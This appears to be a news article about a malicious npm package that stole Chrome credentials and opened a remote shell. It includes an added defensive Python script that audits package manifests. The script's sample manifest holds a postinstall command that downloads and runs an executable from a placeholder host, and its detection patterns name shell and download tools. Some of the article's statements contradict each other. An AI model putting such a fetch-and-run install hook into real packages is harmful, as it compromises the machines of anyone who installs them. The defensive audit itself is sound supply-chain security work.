Hackers began to target more popular package repositories

Jul 22, 2021 17:07 GMT  ·  By

A software package available in the official NPM repository turned out to be a front for a program aimed at stealing stored credentials from the Chrome web browser, according to The Hacker News. After being reported yesterday, the malicious package was removed from the repository. 

The malicious package is called "nodejs net server" and has been downloaded more than 1,283 times since February 2019. One questionable detail is that the package's declared repository points to non-existent locations on GitHub.

While the original version of the package was only released to test the NPM package publishing process, the developer, named Chrunlee, made revisions with the purpose of implementing a remote shell capability. Then a script ("hxxps:/chrunlee.cn/a.exe") was added to download ChromePass, which was later changed to TeamViewer.

The malware developer's trick was to use a malicious variant of a real package called "jstest", a cross-platform JavaScript testing framework, to hijack the execution of a service capable of file execution, camera and screen recording, and file lookup.
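The two indicators the article describes, an install-time script that fetches a remote executable and a repository field pointing at a GitHub location that does not exist, can both be surfaced by a manifest audit before a package is added to a project. The following is an added example written for this article, not code from the package, the researchers, or npm; the manifest it scans is constructed, and the download domain is a placeholder.

```python
import json
import re

# npm runs these hooks automatically during `npm install`, so a dropper
# needs only one line here to execute on every machine that installs the package.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

REMOTE_FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil)\b", re.I)
BINARY_URL = re.compile(r"https?://\S+\.(exe|dll|msi|ps1)\b", re.I)
SHELL_SPAWN = re.compile(r"\b(nc|ncat|bash -i|powershell|cmd\.exe)\b", re.I)

def normalize_repo_url(repo) -> str:
    """Turn npm's repository field (a string or {type, url}) into a plain https URL."""
    url = repo.get("url", "") if isinstance(repo, dict) else (repo or "")
    url = re.sub(r"^git\+", "", url)
    url = re.sub(r"^git@github\.com:", "https://github.com/", url)
    return re.sub(r"\.git$", "", url)

def audit_manifest(manifest_json: str) -> dict:
    """Flag install-time hooks that fetch or run remote code, and extract the
    declared source repository so its existence can be checked out of band
    (the check itself is left out so this block runs offline)."""
    pkg = json.loads(manifest_json)
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = (pkg.get("scripts") or {}).get(hook, "")
        if REMOTE_FETCH.search(cmd) or BINARY_URL.search(cmd):
            findings.append(f"{hook}: fetches remote content: {cmd}")
        if SHELL_SPAWN.search(cmd):
            findings.append(f"{hook}: spawns a shell or interpreter: {cmd}")
    repo_url = normalize_repo_url(pkg.get("repository"))
    if not repo_url:
        findings.append("repository: no source repository declared")
    return {"findings": findings, "repository_to_verify": repo_url}

# Constructed sample manifest modelled on the behaviour described in the article;
# the package name, user and domain are placeholders, not the real ones.
SUSPECT_MANIFEST = json.dumps({
    "name": "example-net-server",
    "version": "1.1.2",
    "repository": {"type": "git", "url": "git+https://github.com/example-user/does-not-exist.git"},
    "scripts": {
        "postinstall": "curl -sSL https://example.invalid/a.exe -o a.exe && a.exe",
        "test": "jstest"
    }
})

if __name__ == "__main__":
    report = audit_manifest(SUSPECT_MANIFEST)
    print("\n".join(report["findings"]))
    print("verify repository exists:", report["repository_to_verify"])
```

A hit on a lifecycle hook is a reason to read the package source before installing it, not proof of malice; legitimate native modules also download prebuilt binaries in `postinstall`.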

Because of their popularity and ease of use, cybercriminals started to target package repositories 

Karlo Zanki, a researcher at ReversingLabs, said the fake NPM package is not malicious by itself, but it can become dangerous if cybercriminals use it in a malicious way.

He explained further that the growing popularity and ease of use of software package repositories make them an excellent target for malware developers. Developers rarely perform rigorous security checks on existing libraries before including them in their projects, even though they include them precisely to make building critical functionality faster and easier.

He added that the reason for this omission is the excessive number of potential vulnerabilities discovered in third-party code. If a package does not fix the problem, the next step is to try another one. This is a risky activity that can lead to the installation of malicious software.